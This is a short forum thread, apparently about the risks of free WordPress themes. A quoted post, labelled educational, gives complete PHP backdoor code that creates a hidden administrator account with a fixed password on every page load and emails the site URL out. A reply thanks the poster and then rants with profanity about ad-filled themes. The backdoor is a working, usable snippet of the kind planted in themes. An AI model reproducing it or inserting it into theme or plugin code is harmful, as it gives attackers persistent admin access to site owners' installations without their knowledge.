Quote:
Originally Posted by fris
thats the thing about wp, its incredibly easy to do nasty stuff.
this is for educational purposes only
Code:
add_action('init', 'silly_backdoor');
function silly_backdoor() {
if (!username_exists('douchebag')) {
$user_id = wp_create_user('douchebag', 'ahjsa97812jkjh');
$user = new WP_User($user_id);
$user->set_role('administrator');
mail('[email protected]', "New theme install" , get_bloginfo('url'));
}
}
would create an admin account and email details once added with site url details. |
Thank you for sharing this. I always thought what is there to stop people if they wanted to add malicious code. Now I clearly see they do.
I downloaded a theme to try out and it had tons of fucking ads in the admin/dashboard. People are just pure shitheads. Turn something free into bullshit they all can suck a dick!